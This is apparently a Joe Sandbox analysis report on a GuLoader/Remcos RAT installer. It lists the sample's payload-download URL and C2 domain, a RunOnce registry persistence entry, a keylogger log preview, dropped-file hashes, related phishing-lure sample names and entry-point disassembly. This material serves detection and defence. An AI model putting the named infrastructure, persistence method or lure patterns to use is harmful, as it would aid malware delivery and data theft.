                            http://nsis.sf.net/NSIS_ErrorErrorx6yDsHJ9tr.exe, 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000000.00000000.2092615557.000000000040A000.00000008.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000004.00000000.3369669549.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                              high
                              https://teldrum.ro/NJrdZqNcCtz102.binZx6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://teldrum.ro/x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://teldrum.ro/&x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              43.226.229.209
                              linktreewealth.zapto.orgHong Kong
                              36351SOFTLAYERUStrue
                              109.99.162.14
                              teldrum.roRomania
                              9050RTDBucharestRomaniaROfalse
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1590938
                              Start date and time:2025-01-14 15:39:02 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 50s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:x6yDsHJ9tr.exe
                              (renamed file extension from none to exe, renamed because original name is a hash value)
                              Original Sample Name:4e8d586a950492c30147b7d56bcfad49cd577966
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/10@17/2
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 84%
                              • Number of executed functions: 46
                              • Number of non-executed functions: 35
                              Cookbook Comments:
                              • Override analysis time to 240s for sample files taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              09:42:58API Interceptor1067937x Sleep call for process: x6yDsHJ9tr.exe modified
                              15:42:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
                              15:42:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              43.226.229.2092T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                109.99.162.142T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                    z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        DHL_119040 receipt document,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exeGet hashmaliciousAgentTeslaBrowse
                                            SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeGet hashmaliciousAgentTeslaBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              teldrum.ro2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                              • 109.99.162.14
                                              z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              linktreewealth.zapto.org2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 43.226.229.209
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              RTDBucharestRomaniaROarm7.elfGet hashmaliciousMiraiBrowse
                                              • 109.102.20.98
                                              2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              4.elfGet hashmaliciousUnknownBrowse
                                              • 193.231.241.68
                                              Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                              • 92.83.30.89
                                              3.elfGet hashmaliciousUnknownBrowse
                                              • 109.99.173.54
                                              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                              • 109.99.162.14
                                              z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              ppc.elfGet hashmaliciousMiraiBrowse
                                              • 92.87.162.218
                                              SOFTLAYERUSspc.elfGet hashmaliciousUnknownBrowse
                                              • 169.50.198.158
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                              • 165.192.205.133
                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 169.52.8.120
                                              meth5.elfGet hashmaliciousMiraiBrowse
                                              • 161.202.248.213
                                              meth15.elfGet hashmaliciousMiraiBrowse
                                              • 216.40.224.50
                                              2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 43.226.229.209
                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 103.56.222.75
                                              https://www.facebook.com/share/1A9gt2P1afGet hashmaliciousUnknownBrowse
                                              • 52.116.53.155
                                              res.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 184.172.25.27
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              37f463bf4616ecd445d4a1937da06e192T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 109.99.162.14
                                              183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                              • 109.99.162.14
                                              Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                              • 109.99.162.14
                                              sysadmin.exeGet hashmaliciousVidarBrowse
                                              • 109.99.162.14
                                              JUbmpeT.exeGet hashmaliciousVidarBrowse
                                              • 109.99.162.14
                                              149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                              • 109.99.162.14
                                              149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                              • 109.99.162.14
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                  2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                    2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exeGet hashmaliciousUnknownBrowse
                                                          RFQ_BDS636011.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):3.3991347456360272
                                                                Encrypted:false
                                                                SSDEEP:3:rglsKl63rwl55JWRal2Jl+7R0DAlBG4moojklovDl6v:Mlsel55YcIeeDAlS1gWAv
                                                                MD5:72EB6AB8CA73E62124FDF6BEC3BC06CE
                                                                SHA1:3EBFBE2B886E78E2B342AEBC714F6598544B761A
                                                                SHA-256:F04CEA4D262A917002FCA023F61B0104C98166C316766AFFEE6252577609C077
                                                                SHA-512:8C46EC5DB35B823CF38CC915EC8A1421DD63F03D53BE9B13F2E2AB6CC9CB35351B09DFAE359295E9FEFDBE1AE6C873DA3EA5557BAA8A18E34717138AA1200DD8
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                Reputation:low
                                                                Preview:....[.2.0.2.5./.0.1./.1.4. .0.9.:.4.2.:.2.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):25
                                                                Entropy (8bit):4.0536606896881855
                                                                Encrypted:false
                                                                SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                MD5:08CA75DA54EB4810D18796C97F510A55
                                                                SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:[Bus Clock]..Gats=Galse..
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):550217
                                                                Entropy (8bit):7.712228071105721
                                                                Encrypted:false
                                                                SSDEEP:6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
                                                                MD5:25EEC63EDF7C0EB8628A89712B5CB363
                                                                SHA1:4E8D586A950492C30147B7D56BCFAD49CD577966
                                                                SHA-256:E075807417590255DE4D395FA3DFBC336E88C96BBAB8AFCA1D5E5D5ABBAC0237
                                                                SHA-512:086FEB119E2A02F2FD7AFC45C422F9B472F049EB2E79F83769F25254D88A84086275D2CFF1E891D360EA57978292CD0CAF958E4000CD659AC532165E1F881DFB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):12288
                                                                Entropy (8bit):5.805604762622714
                                                                Encrypted:false
                                                                SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                                • Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse
                                                                • Filename: , Detection: malicious, Browse
                                                                • Filename: RFQ_BDS636011.exe, Detection: malicious, Browse
                                                                • Filename: Quotation.exe, Detection: malicious, Browse
                                                                • Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1091527
                                                                Entropy (8bit):3.7883797592579986
                                                                Encrypted:false
                                                                SSDEEP:12288:qvZYo2Z5DAmaghhFm2YqtP4lIxgBVLpadBoS9CR:8YdJagOWP4EeVLeOF
                                                                MD5:714AB9E19CCDB0A431DB45B3EFD1D462
                                                                SHA1:C61D1E403FDF00B6FC47481D1C56BE7368A496E7
                                                                SHA-256:2B9B7C3E4EA530F8AE338734ED61B365F0A124687EE88BEAE57E07259B0DCE66
                                                                SHA-512:A6E108B4787A8EA44BC6187960FBEC6B5C7954ED6695060C4BE8A88B579928CA31E4E30501374F9F896DEF92438EE1A04C2DBDA6CD4255E24587DE4741595F0B
                                                                Malicious:false
                                                                Preview:........,...................X...d.......d...................................................................................................................................................................................................................................................G...Y...........q...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                                                                Category:dropped
                                                                Size (bytes):267655
                                                                Entropy (8bit):1.2559804952290619
                                                                Encrypted:false
                                                                SSDEEP:768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
                                                                MD5:F6A4342C9271CFFEF29695EEA330941E
                                                                SHA1:291ABCFA507BA730832511E5F47EAA2CB4DFABBD
                                                                SHA-256:605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
                                                                SHA-512:D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
                                                                Malicious:false
                                                                Preview:...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):114454
                                                                Entropy (8bit):1.2519787240577294
                                                                Encrypted:false
                                                                SSDEEP:768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
                                                                MD5:F85E20AA1A28EEFFC89F744F6B6B67B3
                                                                SHA1:B61AEF131017C5605647983CE2D55769914BB104
                                                                SHA-256:C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
                                                                SHA-512:EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
                                                                Malicious:false
                                                                Preview:...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):310550
                                                                Entropy (8bit):1.2527719188567612
                                                                Encrypted:false
                                                                SSDEEP:1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
                                                                MD5:72FA348549D0BD9CE66E5F3EBA54DF3A
                                                                SHA1:D5B4797D07374226CD8173964DF8753F4ABB9E6E
                                                                SHA-256:7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
                                                                SHA-512:D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
                                                                Malicious:false
                                                                Preview:...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................|....................................r.............................W.............................................X.....................................................q.................
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):83152
                                                                Entropy (8bit):4.590487128538397
                                                                Encrypted:false
                                                                SSDEEP:1536:mPpv9Hyk6GJxFF88oQTFd5xzmxgxAVH3r2gnnAOpuIg:mPpvdys0xQT/5m9SJEuIg
                                                                MD5:3B9A97DDA581FFCEB29B192F228D66DF
                                                                SHA1:A11D7ADCC7A283B75D217A27724324F53FB91540
                                                                SHA-256:F783B047374C53913141CAFDE79B94B7C0D3AEA69AE86EA4417D7C8EB7798529
                                                                SHA-512:13BD775B3FF31F2127C28D26942DE8235EFE96AF4E2A921DBD82C813B53167E7B3E331A7F45178A77E65C2EF9CDA0D25DEAD6C775FFEC0F0E8CAD45DCB0DDF7E
                                                                Malicious:false
                                                                Preview:..UU...........K....]]]]]...FF...6.........g....++.....D.....;.s.:..//..d..O....AAA....=._...........;;;..........W............................888.......L.....CCC...............66..../..........vvv.........q..................C....<<<..................e..............-......qq..*.D.......00...%....""".======.#........................................'.........C.........UU..............L...^.......+............222.333.kkk.MMMMMMMMMM....................Q............ll.........hh.........ss.......>.........E......%%%..........................MM.................................... ...........:...........................Y.................[................................ ...........55555......<<<<.?.........//....D.Y.$$.............I..%.....................-..zz..sss.......=.........333.................KK.........JJ...................R...'.....................X..9....XXXXXXXXX.Z.......S...S......I...77.............eeeee....w...................................................v..gg.....222.
                                                                Process:C:\Users\user\Desktop\x6yDsHJ9tr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):295959
                                                                Entropy (8bit):7.608537202687179
                                                                Encrypted:false
                                                                SSDEEP:6144:WH4o5aBQ0lz5DJimagdvhT7lmfp8Fpzkc1PlKQl4ZPIxo4+V6GVS2paf:WYo2Z5DAmaghhFm2YqtP4lIxgBVLpaf
                                                                MD5:5B2D5C7C1482936796C2699166B34424
                                                                SHA1:493E890B6548A54DDADB5D450797BBE68429502C
                                                                SHA-256:A7C9A3BE29FACF27782B90B0E6EE7D6B645CD7F827C6475BFD19A6480D0890EA
                                                                SHA-512:3983BFC12B10AB6C26BF3D070CAA9960C6F6DF07D48BB27318C984BD2CA56CF310050E0ED40A8E11E284B70413B01773DF7F5178216953AF5A5E47E4F7A89368
                                                                Malicious:false
                                                                Preview:.#............H.......................xxx.$............@..W.......dd..............................dddd...MM.........qq...........u.....PP...............A.............!!!.```.....BBBBBBB.999..........+......................X.n.....11.g........W.........y.....fff....-.........,..<<<....s........EEE........................AAA...w.CCC.......j.......^.!.w...ZZZZZZ....................................._.....___.............@@..........................ww...uuuuuu.C..............f...22..........E.:...........4..-......e.........ww...<<<<. ...........................B..f.....TT.7777..............www.....T.cc..xx.`....f..33...I...<<<<....tttt........Q...J.......................000..&.TT......==......A........jjj..M.ss........BBB.....DD.~~.........LLLLL.C.,..........r..........EE......................;........gg.....????..M.*.............==.....b..............J................................cc.............Y.U....E.....yyy.. ....AA..C......=....qqqqqq..............K.llll......bbb...@.?..........
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.712228071105721
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:x6yDsHJ9tr.exe
                                                                File size:550'217 bytes
                                                                MD5:25eec63edf7c0eb8628a89712b5cb363
                                                                SHA1:4e8d586a950492c30147b7d56bcfad49cd577966
                                                                SHA256:e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
                                                                SHA512:086feb119e2a02f2fd7afc45c422f9b472f049eb2e79f83769f25254d88a84086275d2cff1e891d360ea57978292cd0caf958e4000cd659ac532165e1f881dfb
                                                                SSDEEP:6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
                                                                TLSH:D9C4F1E4E210C1A7E25F5D38DAB169F11D80BC38D1E1087B43507EA9F4B2A2599EF91F
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                                Icon Hash:4571753721719a8d
                                                                Entrypoint:0x403645
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                Instruction
                                                                sub esp, 000003F8h
                                                                push ebp
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                pop edi
                                                                xor ebp, ebp
                                                                push 00008001h
                                                                mov dword ptr [esp+20h], ebp
                                                                mov dword ptr [esp+18h], 0040A230h
                                                                mov dword ptr [esp+14h], ebp
                                                                call dword ptr [004080A0h]
                                                                mov esi, dword ptr [004080A4h]
                                                                lea eax, dword ptr [esp+34h]
                                                                push eax
                                                                mov dword ptr [esp+4Ch], ebp
                                                                mov dword ptr [esp+0000014Ch], ebp
                                                                mov dword ptr [esp+00000150h], ebp
                                                                mov dword ptr [esp+38h], 0000011Ch
                                                                call esi
                                                                test eax, eax
                                                                jne 00007F98EC7F5FEAh
                                                                lea eax, dword ptr [esp+34h]
                                                                mov dword ptr [esp+34h], 00000114h
                                                                push eax
                                                                call esi
                                                                mov ax, word ptr [esp+48h]
                                                                mov ecx, dword ptr [esp+62h]
                                                                sub ax, 00000053h
                                                                add ecx, FFFFFFD0h
                                                                neg ax
                                                                sbb eax, eax
                                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                                not eax
                                                                and eax, ecx
                                                                mov word ptr [esp+00000148h], ax
                                                                cmp dword ptr [esp+38h], 0Ah
                                                                jnc 00007F98EC7F5FB8h
                                                                and word ptr [esp+42h], 0000h
                                                                mov eax, dword ptr [esp+40h]
                                                                movzx ecx, byte ptr [esp+3Ch]
                                                                mov dword ptr [00429B18h], eax
                                                                xor eax, eax
                                                                mov ah, byte ptr [esp+38h]
                                                                movzx eax, ax
                                                                or eax, ecx
                                                                xor ecx, ecx
                                                                mov ch, byte ptr [esp+00000148h]
                                                                movzx ecx, cx
                                                                shl eax, 10h
                                                                or eax, ecx
                                                                movzx ecx, byte ptr [esp+0000004Eh]
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x18858.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x4a0000x188580x18a0073bbe3fdd1585fbd610b24874590b455False0.22416322969543148data5.2980000367452575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x4a4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.14908908079971608
                                                                RT_ICON0x5ac400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.27520746887966807
                                                                RT_ICON0x5d1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3553001876172608
                                                                RT_ICON0x5e2900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.48667377398720685
                                                                RT_ICON0x5f1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43934426229508194
                                                                RT_ICON0x5fac00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.569043321299639
                                                                RT_ICON0x603680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.5552995391705069
                                                                RT_ICON0x60a300x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.18841463414634146
                                                                RT_ICON0x610980x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4869942196531792
